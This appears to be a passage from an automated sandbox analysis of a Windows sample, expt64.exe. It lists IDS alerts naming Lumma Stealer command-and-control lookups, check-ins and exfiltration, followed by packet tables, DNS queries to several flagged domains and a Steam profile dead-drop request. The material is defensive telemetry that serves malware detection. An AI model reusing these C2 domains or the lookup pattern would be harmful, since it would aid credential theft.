2025-01-10T11:36:19.596381+0100	2058484	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)	1	192.168.2.12	49419	1.1.1.1	53	UDP
2025-01-10T11:36:19.610905+0100	2058512	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)	1	192.168.2.12	52479	1.1.1.1	53	UDP
2025-01-10T11:36:19.624899+0100	2058480	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)	1	192.168.2.12	50747	1.1.1.1	53	UDP
2025-01-10T11:36:20.299112+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49715	104.102.49.254	443	TCP
2025-01-10T11:36:20.782904+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.12	49715	104.102.49.254	443	TCP
2025-01-10T11:36:21.414391+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49716	104.21.64.1	443	TCP
2025-01-10T11:36:21.874704+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.12	49716	104.21.64.1	443	TCP
2025-01-10T11:36:21.874704+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.12	49716	104.21.64.1	443	TCP
2025-01-10T11:36:22.439288+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49717	104.21.64.1	443	TCP
2025-01-10T11:36:22.914361+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.12	49717	104.21.64.1	443	TCP
2025-01-10T11:36:22.914361+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.12	49717	104.21.64.1	443	TCP
2025-01-10T11:36:23.858172+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49719	104.21.64.1	443	TCP
2025-01-10T11:36:25.272889+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49722	104.21.64.1	443	TCP
2025-01-10T11:36:26.645648+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49724	104.21.64.1	443	TCP
2025-01-10T11:36:28.057227+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49725	104.21.64.1	443	TCP
2025-01-10T11:36:28.492586+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.12	49725	104.21.64.1	443	TCP
2025-01-10T11:36:29.027636+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49727	104.21.64.1	443	TCP
2025-01-10T11:36:30.372212+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49728	104.21.64.1	443	TCP
2025-01-10T11:36:30.829987+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.12	49728	104.21.64.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 11:36:19.654933929 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:19.654961109 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:19.655112028 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:19.659447908 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:19.659476995 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.299000978 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.299112082 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.302761078 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.302787066 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.303092003 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.365618944 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.411341906 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.782936096 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.782962084 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.782969952 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.783006907 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.783027887 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.783091068 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.783107996 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.783152103 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.783198118 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.877121925 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.877161026 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.877458096 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.877480984 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.877589941 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.882302046 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.882478952 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.886744976 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.886831999 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.886918068 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.887718916 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.887718916 CET	49715	443	192.168.2.12	104.102.49.254
Jan 10, 2025 11:36:20.887737989 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.887742996 CET	443	49715	104.102.49.254	192.168.2.12
Jan 10, 2025 11:36:20.941991091 CET	49716	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:20.942040920 CET	443	49716	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:20.942140102 CET	49716	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:20.942652941 CET	49716	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:20.942665100 CET	443	49716	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:21.414235115 CET	443	49716	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:21.414391041 CET	49716	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:21.416764975 CET	49716	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:21.416779041 CET	443	49716	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:21.417045116 CET	443	49716	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:21.418411970 CET	49716	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:21.418427944 CET	49716	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:21.418483973 CET	443	49716	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:21.874720097 CET	443	49716	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:21.874824047 CET	443	49716	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:21.874881029 CET	49716	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:21.875386000 CET	49716	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:21.875386000 CET	49716	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:21.875416994 CET	443	49716	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:21.875432968 CET	443	49716	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:21.961131096 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:21.961162090 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:21.961316109 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:21.962759972 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:21.962770939 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.439193964 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.439287901 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:22.440700054 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:22.440717936 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.441024065 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.442212105 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:22.442213058 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:22.442326069 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.914361954 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.914417982 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.914449930 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.914479017 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.914483070 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:22.914495945 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.914961100 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:22.915380001 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.915415049 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.915437937 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:22.915446997 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.915836096 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:22.915843010 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.919090986 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.919123888 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.919250011 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:22.919264078 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:22.919337988 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.005317926 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:23.005388021 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:23.005470037 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.005490065 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:23.005562067 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.005738020 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.005759954 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:23.005774975 CET	49717	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.005786896 CET	443	49717	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:23.309303045 CET	49719	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.309341908 CET	443	49719	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:23.309426069 CET	49719	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.309778929 CET	49719	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.309789896 CET	443	49719	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:23.858093977 CET	443	49719	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:23.858171940 CET	49719	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.860057116 CET	49719	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.860064030 CET	443	49719	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:23.860368013 CET	443	49719	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:23.861684084 CET	49719	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.861818075 CET	49719	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:23.861841917 CET	443	49719	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:24.454958916 CET	443	49719	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:24.455049038 CET	443	49719	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:24.455338955 CET	49719	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:24.455665112 CET	49719	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:24.455682039 CET	443	49719	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:24.804461956 CET	49722	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:24.804508924 CET	443	49722	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:24.804651022 CET	49722	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:24.805083990 CET	49722	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:24.805097103 CET	443	49722	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:25.272804976 CET	443	49722	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:25.272888899 CET	49722	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:25.274235964 CET	49722	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:25.274249077 CET	443	49722	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:25.274547100 CET	443	49722	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:25.283934116 CET	49722	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:25.284152031 CET	49722	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:25.284172058 CET	443	49722	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:25.284221888 CET	49722	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:25.331331968 CET	443	49722	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:25.789886951 CET	443	49722	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:25.789988995 CET	443	49722	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:25.790049076 CET	49722	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:25.790234089 CET	49722	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:25.790252924 CET	443	49722	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:26.115585089 CET	49724	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:26.115638971 CET	443	49724	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:26.115712881 CET	49724	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:26.116137981 CET	49724	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:26.116151094 CET	443	49724	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:26.645570993 CET	443	49724	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:26.645648003 CET	49724	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:26.647562027 CET	49724	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:26.647576094 CET	443	49724	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:26.647854090 CET	443	49724	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:26.657195091 CET	49724	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:26.657361984 CET	49724	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:26.657397032 CET	443	49724	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:26.657512903 CET	49724	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:26.657524109 CET	443	49724	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:27.266872883 CET	443	49724	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:27.266963959 CET	443	49724	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:27.267072916 CET	49724	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:27.267327070 CET	49724	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:27.267350912 CET	443	49724	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:27.600182056 CET	49725	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:27.600239038 CET	443	49725	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:27.600378036 CET	49725	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:27.600706100 CET	49725	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:27.600724936 CET	443	49725	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:28.057106018 CET	443	49725	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:28.057226896 CET	49725	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:28.058609962 CET	49725	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:28.058626890 CET	443	49725	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:28.058960915 CET	443	49725	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:28.065282106 CET	49725	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:28.065377951 CET	49725	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:28.065387964 CET	443	49725	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:28.492594957 CET	443	49725	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:28.492697954 CET	443	49725	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:28.492785931 CET	49725	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:28.493081093 CET	49725	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:28.493104935 CET	443	49725	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:28.552181959 CET	49727	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:28.552247047 CET	443	49727	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:28.552352905 CET	49727	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:28.552690029 CET	49727	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:28.552706003 CET	443	49727	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:29.027561903 CET	443	49727	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:29.027636051 CET	49727	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:29.028945923 CET	49727	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:29.028966904 CET	443	49727	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:29.029237032 CET	443	49727	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:29.030318022 CET	49727	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:29.030404091 CET	49727	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:29.030412912 CET	443	49727	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:29.562361002 CET	443	49727	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:29.562463999 CET	443	49727	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:29.562551975 CET	49727	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:29.586242914 CET	49727	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:29.586278915 CET	443	49727	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:29.907653093 CET	49728	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:29.907701969 CET	443	49728	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:29.907783031 CET	49728	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:29.908545971 CET	49728	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:29.908560038 CET	443	49728	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:30.372078896 CET	443	49728	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:30.372211933 CET	49728	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:30.373699903 CET	49728	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:30.373714924 CET	443	49728	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:30.373994112 CET	443	49728	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:30.375376940 CET	49728	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:30.375400066 CET	49728	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:30.375451088 CET	443	49728	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:30.829986095 CET	443	49728	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:30.830090046 CET	443	49728	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:30.830192089 CET	49728	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:30.830455065 CET	49728	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:30.830478907 CET	443	49728	104.21.64.1	192.168.2.12
Jan 10, 2025 11:36:30.830493927 CET	49728	443	192.168.2.12	104.21.64.1
Jan 10, 2025 11:36:30.830498934 CET	443	49728	104.21.64.1	192.168.2.12

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 11:36:19.519202948 CET	56350	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:19.528076887 CET	53	56350	1.1.1.1	192.168.2.12
Jan 10, 2025 11:36:19.532990932 CET	64590	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:19.541435957 CET	53	64590	1.1.1.1	192.168.2.12
Jan 10, 2025 11:36:19.543790102 CET	56265	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:19.553548098 CET	53	56265	1.1.1.1	192.168.2.12
Jan 10, 2025 11:36:19.558398962 CET	54281	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:19.568311930 CET	53	54281	1.1.1.1	192.168.2.12
Jan 10, 2025 11:36:19.573165894 CET	53122	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:19.581888914 CET	53	53122	1.1.1.1	192.168.2.12
Jan 10, 2025 11:36:19.584352016 CET	56378	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:19.593548059 CET	53	56378	1.1.1.1	192.168.2.12
Jan 10, 2025 11:36:19.596380949 CET	49419	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:19.606270075 CET	53	49419	1.1.1.1	192.168.2.12
Jan 10, 2025 11:36:19.610904932 CET	52479	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:19.620088100 CET	53	52479	1.1.1.1	192.168.2.12
Jan 10, 2025 11:36:19.624898911 CET	50747	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:19.633615971 CET	53	50747	1.1.1.1	192.168.2.12
Jan 10, 2025 11:36:19.638715029 CET	52013	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:19.645776033 CET	53	52013	1.1.1.1	192.168.2.12
Jan 10, 2025 11:36:20.931272984 CET	55519	53	192.168.2.12	1.1.1.1
Jan 10, 2025 11:36:20.940433025 CET	53	55519	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 11:36:19.519202948 CET	192.168.2.12	1.1.1.1	0xd875	Standard query (0)	brendon-sharjen.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.532990932 CET	192.168.2.12	1.1.1.1	0xb21	Standard query (0)	wordyfindy.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.543790102 CET	192.168.2.12	1.1.1.1	0x6b86	Standard query (0)	slipperyloo.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.558398962 CET	192.168.2.12	1.1.1.1	0x5987	Standard query (0)	manyrestro.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.573165894 CET	192.168.2.12	1.1.1.1	0xdba1	Standard query (0)	shapestickyr.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.584352016 CET	192.168.2.12	1.1.1.1	0x9eeb	Standard query (0)	talkynicer.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.596380949 CET	192.168.2.12	1.1.1.1	0x7cf7	Standard query (0)	curverpluch.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.610904932 CET	192.168.2.12	1.1.1.1	0x6b8d	Standard query (0)	tentabatte.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.624898911 CET	192.168.2.12	1.1.1.1	0x60d6	Standard query (0)	bashfulacid.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.638715029 CET	192.168.2.12	1.1.1.1	0xff0a	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:20.931272984 CET	192.168.2.12	1.1.1.1	0xc5c	Standard query (0)	sputnik-1985.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 11:36:19.528076887 CET	1.1.1.1	192.168.2.12	0xd875	Name error (3)	brendon-sharjen.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.541435957 CET	1.1.1.1	192.168.2.12	0xb21	Name error (3)	wordyfindy.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.553548098 CET	1.1.1.1	192.168.2.12	0x6b86	Name error (3)	slipperyloo.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.568311930 CET	1.1.1.1	192.168.2.12	0x5987	Name error (3)	manyrestro.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.581888914 CET	1.1.1.1	192.168.2.12	0xdba1	Name error (3)	shapestickyr.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.593548059 CET	1.1.1.1	192.168.2.12	0x9eeb	Name error (3)	talkynicer.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.606270075 CET	1.1.1.1	192.168.2.12	0x7cf7	Name error (3)	curverpluch.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.620088100 CET	1.1.1.1	192.168.2.12	0x6b8d	Name error (3)	tentabatte.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.633615971 CET	1.1.1.1	192.168.2.12	0x60d6	Name error (3)	bashfulacid.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:19.645776033 CET	1.1.1.1	192.168.2.12	0xff0a	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:20.940433025 CET	1.1.1.1	192.168.2.12	0xc5c	No error (0)	sputnik-1985.com		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:20.940433025 CET	1.1.1.1	192.168.2.12	0xc5c	No error (0)	sputnik-1985.com		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:20.940433025 CET	1.1.1.1	192.168.2.12	0xc5c	No error (0)	sputnik-1985.com		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:20.940433025 CET	1.1.1.1	192.168.2.12	0xc5c	No error (0)	sputnik-1985.com		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:20.940433025 CET	1.1.1.1	192.168.2.12	0xc5c	No error (0)	sputnik-1985.com		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:20.940433025 CET	1.1.1.1	192.168.2.12	0xc5c	No error (0)	sputnik-1985.com		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:36:20.940433025 CET	1.1.1.1	192.168.2.12	0xc5c	No error (0)	sputnik-1985.com		104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sputnik-1985.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49715	104.102.49.254	443	6988	C:\Users\user\Desktop\expt64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:36:20 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-10 10:36:20 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net 